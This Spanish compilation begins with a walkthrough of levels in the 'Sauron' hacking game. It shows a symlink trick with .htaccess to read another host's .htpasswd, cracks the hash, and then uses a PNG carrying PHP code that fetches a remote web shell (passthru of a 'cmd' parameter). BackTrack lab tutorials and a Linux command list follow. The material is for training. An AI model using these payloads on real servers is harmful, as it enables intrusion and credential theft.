DocumentRoot /var/www/intranet/htdocs
ServerName intranet.blindware.inc
SuexecUserGroup intranet intranet
<Directory />
Options Indexes SymLinksIfOwnerMatch ExecCGI
AllowOverride All
</Directory>
</VirtualHost>

De esta configuración, lo primero que extraemos, es que los hosts están aislados mediante Apache suEXEC, lo cual hace que PHP esté configurado para ejecución en modo CGI, en vez de cómo módulo de Apache, y por ello antes necesitábamos permisos de ejecución en los ficheros PHP. Tal y como comentamos con anterioridad, no es recomendable ir reinventando la rueda a cada paso, por ello, la pregunta que nos tenemos que hacer en este punto es: ¿existe algún procedimiento público y documentado que permita sobrepasar los mecanismos de aislamiento de hosts basados en Apache suEXEC?.

Existe, únicamente tenemos que buscar en Google: “apache suexec“, “apache suexec bypass“, o similares y encontraremos un documento denominado “Apache suEXEC Bypass” en el cual se nos detalla de forma bastante extensa los problemas de configuración asociados a éste sistema.

A grandes rasgos, nosotros vamos a sacar lo más interesante del documento, para hacernos una idea de cómo podemos proceder para leer ficheros dentro del directorio web del usuario intranet.

1. Los diferentes hosts virtuales de Apache, mediante suEXEC, lo que consiguen es que cada host ejecute comandos CGI, bajo un usuario diferente. De esta forma, por ejemplo, nosotros ejecutamos comandos con “blindware”, mientras que el vhost intranet, ejecuta comandos con el usuario “intranet”.

2. Esto permite un esquema de aislamiento “relativamente” sencillo.

drwxr-x— 3 blindware apache 4096 nov 25 17:00 blindware
drwxr-x— 3 intranet apache 4096 nov 25 17:00 intranet

Si nos damos cuenta, cada usuario es propietario de su directorio, y ningún otro usuario puede acceder a ellos, a excepción del usuario apache, con el que se ejecuta el servicio web. Esto “garantiza”, que aunque el usuario ejecute comandos en el sistema, ningún usuario podrá acceder al directorio de otro usuario.

3. Esta idea, cuenta con un fallo: el enlace simbólico. Los enlaces simbólicos se pueden establecer sobre ficheros en los que no tenemos permisos. Dicho de otra forma, nosotros como usuario “blindware”, podemos enlazar cualquier fichero del usuario “intranet”, del que conozcamos su existencia.

4. Una vez enlazado el fichero, podremos usar Apache, para leer el enlace simbólico, de esta forma, el enlace simbólico será leido con los permisos de Apache, usuario Apache, y podremos acceder a aquellos directorios a los que Apache tenga acceso, que comúnmente son todos los del árbol web, puesto que debe poder leerlos.

5. Para que el ataque tenga éxito Apache, es así por defecto, debe estar activa la opción FollowSymLinks en Apache. Por el contrario, si la opción que se encuentra activa es SymLinksIfOwnerMatch, el ataque no se podrá realizar, puesto que Apache, únicamente seguirá enlaces que apunten a ficheros propiedad del dueño del enlace.

6. En caso de estar activa la directiva SymLinksIfOwnerMatch, podrá ser modificada por un usuario mediante un fichero .htaccess, siempre que las opciones AllowOverride Options, o AllowOverride All, estén habilitadas.

A priori, parece que nos encontramos en un escenario vulnerable: se usa suEXEC, y aunque se encuentra habilitada la opción SymLinksIfOwnerMatch, también está habilitada la cláusula AllowOverride All. Por tanto, es cuestión de proceder, a través de nuestra shell en PHP según lo que vamos a describir a continuación. Un detalle importante, cuando queramos ejecutar contenido en nuestra shell PHP, cualquier instrucción que incluya caracteres mínimamente extraños, debemos hace uso de URLEncode.

1. Lo primero que queremos hacer es escribir un fichero .htaccess que nos permita aprovecharnos de esta vulnerabilidad. La orden bien pudiera ser esta.

echo “Options -SymLinksIfOwnerMatch +FollowSymLinks” > .htaccess

Pero como sabemos, debe ser URLEncodeada, quedando una cadena, para su ejecución en nuestra shell, como la siguiente:

echo+%22Options+-SymLinksIfOwnerMatch+%2BFollowSymLinks%22+%3E+.htaccess

2. Ahora es cuestión de crear un enlace simbólico, sobre algún contenido que nos interese leer del directorio “intranet”. En este caso, lo más interesante es leer el fichero .htaccess de ese directorio, del que nos garantizamos su existencia, y que además nos impide el acceso al contenido web de http://intranet.blindware.inc.
Creamos pues el enlace simbólico:

ln –s /var/www/intranet/htdocs/.htaccess htaccess

De esta forma, tenemos un enlace directo, en nuestro directorio http://www.blindware.inc/_controlp/htacccess, que una vez visitado nos dará el contenido del fichero:

Options +Indexes
AuthName “Blindware – Intranet Protected”
AuthType Basic
AuthUserFile /var/www/intranet/htdocs/.htpasswd
require valid-user

3. Repetimos el proceso, una vez que conocemos la localización del fichero .htpasswd. Para ello creamos otro enlace simbólico:

ln -s /var/www/intranet/htdocs/.htpasswd htpasswd

De esta forma, creamos un enlace directo, en nuestro directorio http://www.blindware.inc/_controlp/htpasswd, que una vez visitado nos dará el contenido del fichero.

admin:tCPJIYCZjtqF6

4. Tenemos el usuario, y el hash del acceso a intranet.blindware.inc, podemos bien intentar crackearlo, bien seguir intentando la lectura de ficheros contenidos en ese directorio. A priori es un hash DES tradicional, con lo cual podemos intentar romperlo, a ver qué sucede.

Para romper el hash, hacemos uso de la herramienta “john the ripper”, que es con diferencia el crackeador de passwords más conocido de Unix.

$ john htpasswd
guesses: 1 time: 0:00:00:10 (3) c/s: 335628 trying: 132449 – 132498
Loaded 1 password hash (Traditional DES [64/64 BS MMX])
132456 (admin)

Pues ya conocemos el password: 132456 con usuario admin. Lo que nos permite acceder a intranet.blindware.inc y seguir avanzando en la resolución de Sauron. Dentro de 15 días, continuaremos con el siguiente nivel.

Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 4 publicado por SG6 Labs:

Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR (SecGame: Sauron)(password: www.dragonjar.org) – Incluye la Shell C99 codificada en base 64 “no detectable”.

Herramientas necesarias:

Shell Linux/BackTrack, Servidor Web (incluido en backtrack-Apache), Shell PHP (en nuestro caso, C99)

Palabras claves (Documentos de interés, Definiciones):

Servidor Web – Apache – PHP – Vulnerabilidades – Comando CAT, Shell, Shell PHP, Null Byte Injection

Este es el aspecto que presenta el nivel 4. Dividido en 4 secciones:

• Información sobre el sistema
• Administración de MySQL mediante MySQL Admin
• Visualización de Estadísticas
• Cambio de parámetros

Sobre la visualización de estadísticas, poco hay que comentar. Ya nos es familiar porque ya hemos accedido a ella, pero desde otro lugar, durante el nivel 2, por tanto no aporta nada a lo que ya conocemos.

Luego existen 2 partes que contienen aplicaciones públicas, por un lado tenemos phpSysInfo, y por otro phpMyAdmin. En la idea original de este juego está el que no sea necesario el uso de fallos en aplicativos públicos para superarlo, siendo así por un motivo bien sencillo: con el paso del tiempo uno o todos los aplicativos que existen instalados en la máquina virtual serán susceptibles de fallos.

No obstante, podemos evaluar la seguridad de estas versiones, y ver que no parecen existir exploits públicos relevantes para las mismas. Existe un XSS en phpSysInfo, poco relevante para una explotación efectiva, al igual que otro en phpMyAdmin. Comentar como apunte que el hecho de que a fecha de hoy no parezcan existir ataques relevantes no quiere decir, evidentemente, que en un futuro no puedan aparecer, e incluso, y dado que son aplicaciones de código abierto, una vez agotadas el resto de vías, es posible que una revisión exhaustiva de su código fuente, y de su ejecución, pueda revelarnos fallos de seguridad no públicos.

Sin embargo, en el caso que nos ocupa, antes de llegar a la revisión de código público, hay que percatarse de la sección “Cambio de parámetros” la cual permite la subida de un fichero al servidor. Ésta *siempre* es una función crítica y debe ser evaluado su riesgo, ya que permitirá al atacante subir algún tipo de contenido a nuestro sistema.

Para el caso que nos ocupa, podemos darnos cuenta que la robustez y codificación de la subida de imágenes es la apropiada:

• Únicamente permite ficheros con extensión PNG
• El tamaño del fichero está limitado a 8KB
• El contenido del fichero debe corresponder con una imagen PNG

Esto hace que no podamos subir un fichero renombrado como .PNG, sino que debamos subir un gráfico PNG, limitado a 8KB, y con extensión PNG. Por tanto, a priori, podemos pensar que no existe posibilidad alguna de explotar ningún fallo. Bien, veremos que no es así.

Lo primero que debemos plantearnos es: ¿en una imagen PNG únicamente puede existir eso?. La respuesta es que no. Nada más sencillo que concatenar al final de un fichero PNG, código ejecutable en formato PHP. Para ello, a partir de una imagen PNG de menos de 8KB y válida para subirla al servidor, hacemos lo siguiente:

$ cat >> img.png
<? phpinfo(); ?>

Para los no familiarizados con UNIX, decir que simplemente hemos añadido al final del fichero ese código PHP. Una vez hecho esto, tendremos un fichero válido, en formato PNG, que contiene al final del mismo un código PHP. Este fichero podrá ser subido al servidor.

¿Y ahora qué?. Ahora queda percatarse de un par de detalles importantes. El primero, ¿cómo se llama el fichero que contiene la imagen?. En este caso, el fichero de imagen es: http://www.blindware.inc/_controlp/image.php, o dicho de otra forma, un fichero PHP se encarga de servir la imagen, de la que aún desconocemos su nombre y ubicación. ¿Cómo podemos saberla?. Pues haciendo uso del error que vimos en el nivel 3 dentro del fichero index.php, que permitía la lectura de ficheros. Con ese error leemos el contenido de image.php:

<? header(“Content-Type: image/png”); readfile(“01.png”); ?>

Por tanto, nuestro fichero subido sabemos que se llama “01.png” y que se encuentra en el mismo directorio de /_controlp/ que el resto de datos. ¿Cómo podemos explotar el fichero con contenido PHP?. En este caso concreto, es cuando se puede apreciar, como la subida de ficheros maximiza el riesgo de otro de los fallos encontrados en el nivel 3. Si recordamos además de leer ficheros mediante el error localizado en index.php, podemos incluir ficheros para ser procesados por PHP desde un error con idéntica explotación localizado en login.php. Al hacerlo obtenemos como resultado de incluir nuestro fichero 01.png manipulado lo siguiente:

Como vemos, el contenido de la instrucción phpinfo() se muestra a continuación de los datos contenidos en la imagen. Esta información puede ser poco relevante, pero para la explotación efectiva únicamente hay que construir un exploit ligeramente más elaborado, que bien pudiera ser el que vamos a comentar a continuación.

El objetivo del exploit es conseguir crear una shell en PHP dentro de esta máquina. Para ello, el código que proponemos incluir dentro de la imagen es el siguiente:

<? copy(“http://ip/shell.txt”,”shell.php”); ?>

Vaya por delante que la explotación se puede realizar de muchas maneras. Nosotros por elegancia, siempre proponemos que el código a incluir en el exploit sea mínimo. En este caso, el exploit únicamente copia una shell remota localizada en shell.txt al servidor victima.

El contenido de shell.txt puede ser el siguiente:

<?
header(“Content-Type: text/plain”);
passthru($_GET[“cmd”);
?>

El objetivo de este script es ejecutar el comando que pasemos como parámetr en la variable “cmd”. De tal forma, si ahora subimos la imagen con el primer código al servidor, y colocamos en la IP de un servidor web que usemos para el ataque el fichero “shell.txt”, debemos conseguir que este se copie al servidor y acceder a él desde la dirección http://www.blindware.inc/_controlp/shell.php

Aquí aparece un problema. Al acceder a esa URL veremos que no aparece nada, y es que hay un detalle importante siempre que subamos contenido ejecutable a un servidor. A priori no sabemos qué permisos serán necesarios para su ejecución, y la función copy lo más probable es que haya creado un fichero con permisos 644. Para ello podemos verificar qué permisos tienen los ficheros php de los que conocemos su existencia. En este caso los ficheros deben tener permisos 755. Por ello tenemos que modificar ligeramente el exploit a incluir dentro del fichero PNG al siguiente:

<? copy(“http://ip/shell.txt”,”shell.php”); chmod(“shell.php”,0755); ?>

Nota: importante colocar un 0 delante del 755, sino no conseguiremos los permisos rwxr-xr-x

Hecho esto, tendremos acceso al sistema de forma remota y habremos superado el nivel, como muestran las siguientes URLs:

http://www.blindware.inc/_controlp/shell.php?cmd=uname%20-a
Linux sauron 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux

http://www.blindware.inc/_controlp/shell.php?cmd=id
uid=500(blindware) gid=500(blindware) groups=500(blindware)

Objetivos del laboratorio:

1. Familiarizarse con la suite de herramientas incluídas en BackTrack.
2. Cambiar la contrseña que viene por defecto en BackTrack.
3. Conocer los direferentes servicios disponibles en BackTrack (básicos).
4. Configurar y poner en marcha los servicios básicos de BackTrack.
5. Comprobar la disponibilidad de los servicios básicos de BackTrack.
6. Realizar pruebas de conexión a los servicios de BackTrack.

Veamos como iniciar con backtrack

Sistema de booteo de BackTrack

Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de login. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.

Para logearnos en el sistema ingresamos:
usuario: root
contraseña: toor

Si desde el comienzo seleccionamos la opción de acceso a la red mediante NAT (VMWare), podemos observar gracias al comando ifconfig nuestras interfaces de red.

Luego podemos configurar el entorno gráfico (xconf) y cargarlo mediante el comando startx
ó Flux (según nuestras preferencias de uso)

Entorno gráfico cargando.

BackTrack cargado como Live CD en su totalidad.

Es importante destacar que el éxito de BackTrack reside en la excelente organización y disposición por grupos de herramientas:

1. Recolección de información
2. Mapeo de red
3. Identificación de vulnerabilidades
4. Penetración / Explotación
5. Escalada de privilegios
6. Mantenimiento del acceso
7. Servicios de red inalámbrica
8. Telefonía sobre VoIP
9. Informática Forense
10. Ingeniería inversa

También podemos ingresar a los diferentes grupos de herramientas desde la línea de comandos:

cd /pentest/

Uno de los primero pasos a realizar debe ser el cambio de contraseña que viene por defecto en backtrack, para ello bastará con ejecutar la siguiente instrucción en la línea de comandos:

passwd

y seguir las instrucciones para completar el cambio

Veremos ahora como identificar y habilitar servicios básicos en backtrack

SSH (Secure Shell)

Empecemos por generar y habilitar el servicio de conexiones seguras (SSHD – Secure Shell Daemon), para ello y desde la línea de comandos ejecutamos la siguiente sintáxis

sshd-generate

Una vez generado nuestro servicio, iniciaremos el mismo como conexión segura:

/usr/sbin/sshd

Ahora, si deseamos comprobar la disponibilidad del servicio de conexiones seguras, basta con ejecutar el siguiente comando para mostrar las conexiones activas y a la escucha en nuestra máquina (para este caso solo consultamos para el puerto 22, puerto usado generalmente para este tipo de conexiones):

netstat -ant|grep 22

Podemos hacer una prueba de conexión desde otro sistema, veamos:

— Servidor Apache —

BackTrack incluye por defecto una instalación del servidor Web Apache, veamos como ponerlo en marcha.

Nota: Cabe aclarar que la mayoría de estos servicios pueden ser ejecutados desde el menu incluído en K-Menú, Servicios. Solo estamos viendo otros métodos en caso de que lo queremos hacer o bien sea, más rápido, ó cuando no tengamos disponible el entorno gráfico.

Pongamos en marcha el servicio de apache desde la línea de comandos:

apachectl start

Y comprobemos la disponiblidad del servicio

netstat -ant|grep 80

Ahora desde un navegador Web

Para detener el servicio solo basta ejecutar la instrucción stop.

apachectl stop

— TFTP (Trivial File Transfer Protocol – Protocolo de transferencia de archivos trivial) —

Veamos como poner en marcha el servidor TFTP que incluye por defecto el S.O BackTrack.

Desde la línea de comandos ejecutamos la siguiente instrucción:

atftpd –daemon –port 69 /tap/

Ahora comprobemos la disponiblidad del servicio

netstat -anu|grep 69

Hagamos una prueba de transferencia de archivos

— VNC —

Veamos como configurar y poner en marcha nuestro propio servicio de VNC en BackTrack, para ello ejecutamos la siguiente instrucción:

vncserver

Solo tenemos que seguir las intrucciones en pantalla (definir contraseña de acceso)

Verifiquemos que nuestra máquina realmente está a la escucha de nuevas conexiones, para ello ejecutamos la siguiente instrucción:

netstat -ant|grep 590

Ahora hagamos una prueba de conexión desde otra máquina

Aquí termina el laboratorio sobre habilitación, configuración y prueba de servicios básicos en BackTrack. Estos mismo servicios pueden ser habilitados de manera gráfica en el propio menú K de BackTrack, además pueden ser encontrados algunos otros instalados por defecto en el sistema, esta será la práctica para cada uno de los seguidores de los laboratorios, espero que sean enviadas las capturas de pantallas, además de los comentarios sobre el mismo.

Palabras clave:
Apache, VNC, TFTP, SSH, BackTrack, Booteo, NAT, VMWare

Nota:
Este nuevo recurso está basado en el sistema de entrenamiento ofrecido por los desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) Offensive-security.com.

Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org
Web Oficial de BackTrack

Lista de herramientas incluídas en BackTrack

El proceso de instalación o puesta en marcha de este LiveCD es un tema que ya ha sido cubierto en diferentes ocasiones en Labs DragonJAR. Veamos algunos enlaces de como llevar a cabo este procedimiento:

Ejecución / Instalación de BackTrack

BackTrack Portable

Instalar Back | Track en el HD de tú PC

Instalar BackTrack en una llave USB

Review BackTrack

Como Instalar Back|Track 3

1. Imágen ISO / LiveCD USB / Appliance de BackTrack
2. Software de virtualización (VMWare WorkStation, VMWare Player, Qemu, Virtual BOX, MOKA5, etc.)
3. PC de mediana capacidad.
4. Conexión a internet (algunos ejercicios, referencias)

Contenido temático:

1. Conceptos básicos de BackTrack
2. Servicios básicos (DHCP, IP, Apache, SSHD, Tftp, VNC)
3. Entorno básico Bash
4. NetCat
5. Wireshark
6. Nmap
7. Técnicas de recolección de información
8. Recursos Web
9. Reconocimiento DNS
10. Reconocimiento SNMP
11. Reconocimiento SMTP
12. Recolección de información Microsoft Netbios
13. Escaneo de puertos
14. ARP Spoofing
15. Explotación de Buffer overflow en Windows
16. Fuzzing
17. Trabajando con Exploits
18. Transferencia de archivos
19. Frameworks de explotación
20. Ataques del lado del cliente
21. Redirección
22. Ataques a contraseñas
23. Vectores de ataques a aplicaciones Web
24. Troyanos
25. NTFS Alternate Data Streams
26. Rootkits

Palabras clave: BackTrack, Test de Penetración, Distribución, LiveCD, scanner de puertos, Vulnerabilidades, exploits, sniffers, SQL Injection, Troyanos, RootKits, NTFS Alternate Data Streams, Fuerza Bruta, Redirección, Fuzzing, Spoofing, NetCat, Bash, Nmap.

Este nuevo recurso estará basado en el sistema de entrenamiento ofrecido por los propios desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) Offensive-security.com.

Comencemos entonces por definir los conceptos de Test de Penetración y BackTrack:

Test de penetración:
Test de Penetración, también llamado a veces “hacking ético” es una evaluación activa de las medidas de seguridad de la información.
En los entornos de red complejos actuales, la exposición potencial al riesgo es cada vez mayor y securizar los sistemas se convierten en un auténtico reto.
A través del Test de Penetración es posible detectar el nivel de Seguridad Interna y Externa de los Sistemas de Información de la empresa, determinando el grado de acceso que tendría un atacante con intenciones maliciosas. Además, el servicio chequea las vulnerabilidades que pueden ser vistas y explotadas por individuos no autorizados, “crackers”, agentes de información, ladrones, antiguos empleados, competidores, etc.

Los servicios de Test de Penetración permiten:
- Evaluar vulnerabilidades por medio de la identificación de debilidades de configuración que puedan ser explotadas.
- Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.
- Proveer recomendaciones prioritizadas para mitigar y eliminar las debilidades.

El Test de Penetración está dirigido a la búsqueda de agujeros de seguridad de forma focalizada en uno o varios recursos críticos, como puede ser el firewall o el servidor Web.

BackTrack:
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.
Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org
Web Oficial de BackTrack

Luego de tener claro las anteriores definiciones podemos entender que la finalidad de nuestro Laboratorio de Test de Penetración con BackTrack, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.

Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.

Palabras clave: BackTrack, Test de Penetración, Distribución, LiveCD, scanner de puertos, Vulnerabilidades, exploits, sniffers, análisis forense, Wireless.

En el próximo Laboratorio, definiré los recursos necesarios y el contenido temático del Laboratorio.

En esta corta sesión de laboratorio haremos lo mismo, pero para nuestra máquina ocupada por BackTrack.

1 - Así mismo como en el anterior laboratorio, comenzamos el proceso de instalación de las herramientas desde el propio menú de VMware WorkStation. (Install VMware Tools…).

2 - Veremos a continuación el mismo mensaje informátivo y de advertencia sobre el proceso que estamos a punto de realizar.

3 - De esta manera aparecera el nuevo dispositivo que contiene los dos paquetes VMware Tools (VMware Tools-x-x-x.i386.rpm, WMware Tools-x-x-x.tar.gz), donde x-x-x, es el número de la versión instalada de VMware WorkStation. Procedemos entonces a “descomprimir” el paquete WMware Tools-x-x-x.tar.gz, por comodidad lo hice en una carpeta en el escritorio.
Abrimos una shell en esa carpeta y procedemos a ejecutar los siguientes comandos:

Comenzaremos creando algunos soft links de los directorios rc.d, para varios niveles de ejecución necesarios por el script de instalación de las VMware Tools. Para obtener más información sobre estos archivos visita este enlace.

Los comandos de ejecución serán los siguientes:

for x in 0 1 2 3 4 5 6
do
ln -s /etc/rc.d/ /etc/rc$x.d
done

Después de esto y como estamos en el mismo directorio contenedor del script instalador, procedemos a su ejecución.

vmware-install.pl

4 - El proceso posterior a este comando es muy repetitivo, y solo requiere la aprobación de las opciones seleccionadas por defecto, así que podemos continuar mediante la orden ENTER del teclado cuando así lo requiera. Aprovecho para recordar, que cada investigador puede aprovechar las diferentes opciones para profundizar en el tema.

5 - Finalmente concluimos con la instalación de las VMware Tools, debemos ver la siguiente pantalla.

6 - Ahora como en la anterior sesión del laboratorio desarrollaremos el ejercicio de realizar un Drag and Drop entre la máquina host y la invitada.

7 - Arrastramos y soltamos el archivo al escritorio de BackTrack.

8 - Archivo transferido a nuestra máquina BackTrack.

Termina de esta manera la cuarta sesión laboratorio, hagamos un recuento de lo aprendido.

- Instalación de las VMware Tools en la máquina virtual ocupada por BackTrack.
- Transferencia de archivos mediante Drag and Drop.

Próxima sesión:
Identificación de Banner’s.

Taller libre:
Instalar otro S.O en una nueva máquina virtual. (El Sistema Operativo puede ser de libre selección) En lo posible enviar algunas capturas e instrucciones del proceso que se llevó a cabo.

El sistema software de virtualización será el mismo utilizado en el libro citado anteriormente: VMware Workstation, para este caso la versión 6.0 y versión 5.5. Recordar además que es posible utilizar una versión de prueba de este aplicativo por 30 días. Clic para tener más información del programa y llevar a cabo la descarga del mismo – Versión 6.0.1 – Versión 5.5

El sistema utilizado como host (donde instalaré el VMware), será una máquina con las siguientes especificaciones técnicas, aunque el programa puede correr con máquinas de más baja capacidad, para más información del aplicativo visitar la página oficial del producto

El proceso de instalación de este aplicativo no varía y no presenta mayor diferencia a casi la totalidad de instalaciones en entornos Windows, otro aplicativo más que se instala con los típicos “siguiente-siguiente”, solo debe prestarse atención en el momento en que pide confirmar la deshabilitación del autorun de CD’s, esto con el fin de evitar salir abruptamente de la máquina virtual cuando insertamos algún CD.

Para finalizar, solo recordar que el llevar estas técnicas y contramedidas a un laboratorio es idea original del especialista y autor del libro “Practical Hacking Techniques and Countermeasures” – Mark D. Spivey. Yo trato simplemente de actualizar un poco el contenido, traducir, adaptar e interpretar de la mejor manera, haciendo ver estos laboratorios de un modo más simple a como los presenta el autor, en nuestro idioma y profundizando en los temas que tengo experiencia.

Luego de instalar el VMware y haber reiniciado el equipo procedemos entonces a ejecutar el programa (doble clic en alguno de los accesos creados por la instalación), para poder llevar a cabo el proceso de instalación de las máquinas virtuales.

Comenzaremos entonces con la instalación de la distribución BackTrack. Esta distribución live cd especializada en temas relacionados con la seguridad de la información también puede ser instalada como S.O residente, será esta entonces nuestra opción de Sistema Operativo residente tipo *nix, aprenderemos así como arrancar la live cd y como llevar a cabo la instalación de la misma para que podamos seguir haciendo uso de ella.

Nota: Las capturas de pantalla son desarrolladas de la manera más clara e informátiva posible, señalando con recuadros azules los puntos de especial interés.

Máquina virtual para la distribución BackTrack

Requerimientos: Imagen iso o CD de la distribución BackTrack – Disponibles en el sitio web de descargas del proyecto – Seleccionar el origen de la imagen iso desde cualquiera de los mirrors disponibles.

1 - Clic en nueva máquina virtual

2 - En el cuadro de diálogo, clic en siguiente.

3 - Aceptar la configuración típica de la nueva máquina virtual – Cada investigador puede profundizar en cada una de las diferentes opciones que aparecen en pantalla, para efectos de mejor personalización y apropiación de sus laboratorios.

4 - Seleccionar como sistema operativo invitado: Linux; versión: Otro Linux

5 - En este paso es posible asignar un nombre a nuestra máquina virtual, además de una ruta de almacenamiento de la misma.

6 - Pasamos de este modo a la pantalla de configuración de nuestro tipo de red. Tenemos 4 opciones disponibles para este efecto. Una breve descripción de estas opciones será la siguiente:

- Use bridged networking: Nuestra máquina virtual tomará una IP propia y con esta será identificada en internet.

- Use network address translation (NAT- Traducción de dirección de red): Nuestra máquina virtual tomará la misma IP que nuestra máquina host, haciendo posible la conexión a internet con esta identificación, además de permitirnos crear pequeñas redes virtuales, objetivo primordial de nuestros laboratorios.

- Use host-only networking: Conecta nuestra máquina virtual a una red privada virtual en nuestro sistema host.

- Do not use a network connection: No usar conexiones de red.

Para nuestros laboratorios utilizaremos en mayor medida la opción ofrecida mediante el acceso NAT, escojemos entonces este campo.

7 – Ahora seleccionamos el tamaño de nuestro disco duro virtual. El tamaño por defecto puede variar según el tamaño real de tu DD, para nuestro sistema BackTrack es suficiente con 4.0 Gigas, las dos opciones adicionales en pantalla:
Allocate all disk space now: Nos permite asignar desde un comienzo este espacio real a nuestro disco virtual, mientras que, dejando sin seleccionar esta opción el espacio será ocupado a medida que se haga necesario para la máquina virtual.
Split disk into 2 GB files: Permite dividir el espacio asignado en pequeñas particiones de 2 GB.

Para esta máquina dejaremos las opciones asignadas por defecto. Recuerdo de nuevo que cada investigador puede profundizar en cada una de las opciones ofrecidas por el aplicativo de virtualización. Para más información estudiar la documentación del producto.

Con estos sencillos paso hemos creado nuestra primera máquina virtual del laboratorio. La captura de pantalla nos muestra el nombre que le asignamos en pasos anteriores, ubicación e información de los dispositivos.

Pasemos ahora a la carga de nuestra LiveCD BackTrack, para su posterior instalación.

Dependiendo de la opción de grabación de la imagen iso, podremos arrancar la misma desde la unidad de CD virtual o desde la imagen iso. – Esta opción puede seleccionarse dando doble clic en CD-ROM (IDE), usar drive físico (imagen grabada de la distro), ó usando imagen iso (seleccionar, buscar y aceptar-ok).

Clic en Start this virtual machine el panel Commands.

8 - Cargará la BIOS de nuestra máquina virtual.

9 - Comienza el sistema de booteo de backTrack.

10 - Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de login. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.

11 - Para logearnos en el sistema ingresamos:
usuario: root
contraseña: toor

12 - Como desde un comienzo seleccionamos la opción de acceso a la red mediante NAT, podemos observar gracias al comando ifconfig nuestras interfaces de redes.

13 - Luego podemos cargar el entorno gráfico de BackTrack mediante el siguiente comando:
startx

14 - Entorno gráfico cargando.

15 - BackTrack cargado como Live CD en su totalidad.

16 - Ahora nos encargaremos de instalar como S.O residente la distribución Live CD, para este efecto debemos como primera medida particionar el disco duro, para llevar a cabo este proceso utilizaremos la utilidad QTParted disponible en la misma distribución BackTrack.
Para encontrar de manera rápida esta utilidad es posible hacer uso de la herramienta buscar, en el menu desplegable de BackTrack, allí debemos ingresar el nombre de la utilidad QTParted, en la ubicación file:/usr, en no más de 5 segundos encontrará la utilidad, procedemos a darle doble clic en el archivo qtparted ubicado en el subdirectorio sbin/

17 - Ejecutamos la utilidad QTParted en su versión 0.4.4, seleccionamos el disco duro a particionar.

18 - Clic derecho para crear las particiones, como primera partición seleccionaremos la del tipo de partición linux-swap, con un tamaño de 256 MB.

19 - Luego otra partición del tipo ext3, con un tamaño de 3.74 GB.

20 - Luego de asignar las futuras particiones procedemos a guardar los cambios.

21 - Antes de llevar a cabo las particiones recibiremos un mensaje de advertencia sobre los riesgos de las acciones a realizar, este riesgo esta directamente relacionado con la perdidad de datos, como es una instalación en limpio no perderemos ningún dato. Aprovamos los cambios a realizar.

22 – Después de un corto proceso de operaciones, recibiremos el mensaje de completado del particionamiento . Clic en OK para salir de la utilidad QTParted.

23 - Después de particionar el disco duro procederemos a montar las nuevas particiones desde la linea de comandos (shell), también disponible de manera directa desde la barra de tareas de BackTrack.

24 – Ejecutamos la herramienta disponible en BackTrack (BackTrack installer), para instalar la distribución como S.O, residente. Para el laboratorio seleccionaré el método de instalación real , lueg, clic en Install.

25 - Proceso de instalación de BackTrack.

26 - Instalación completa, clic en cerrar.

27 - Procedemos en este momento a reiniciar nuestra máquina virtual.

28 - Teclas Ctrl + Alt + Supr, para reiniciar la máquina, recordar sacar el CD de BackTrack, para que cargue nuestro nuevo S.O desde el disco duro.

29 - Después de reiniciar la máquina podemos disfrutar de la distribución BackTrack como sistema residente.

30 - Probando el acceso a internet desde BackTrack.

Termina de esta manera la primera sesión laboratorio, hagamos un recuento de lo aprendido.

- Introducción y descripción de los laboratorios.
- Recursos necesarios para los laboratorios.
- Instalación del aplicativo software de virtualización VMware.
- Creación de la primera máquina virtual.
- Instalación de BackTrack como S.O residente.

Próxima sesión:
Instalación de Windows Server 2003 Edición Enterprise

Muchos de estos comandos serán utilizados en próximos laboratorios (Crptografía, BackTrack, E-Forensics, etc), además dejo enlaces a otra páginas con muchos otros comandos. Veamos:

alias
Define y consulta alias de comandos
arch
Muestra información sobre la arquitectura de la máquina
awk
Búsqueda de patrones y lenguaje de procesamiento

bash
Bourne Again Shell
bg
Desplaza a segundo plano procesos ejecutándose en primer plano
biff
Avisa cuando llega un correo
cat
Concatena y muestra ficheros

cd
Cambia directorio
change
Cambia información sobre la caducidad de las contraseñas
chgrp
Cambia el grupo propietario
chmod
Cambia los permisos de los ficheros
chroot
Ejecuta comando en un directorio raiz especial
chsh
Cambia la shell
clear
Limpia la pantalla del terminal
cp
Copia ficheros y directorios
crontab
Mantiene los ficheros del planificador cron
csh
Shell C
cut
Elimina trozos de cada línea de un fichero
date
Muestra o establece la fecha y hora del sistema
dd
Convierte y copia ficheros
df
Muestra información sobre el espacio libre del disco
diff
Busca diferencias entre ficheros
dig
Utilidad de búsqueda DNS (Domain Name System)
dmesg
Muestra mensajes de diagnóstico desde el búfer del sistema
dnsdomainname
Muestra el nombre DNS (Domain Name System) del sistema
domainname
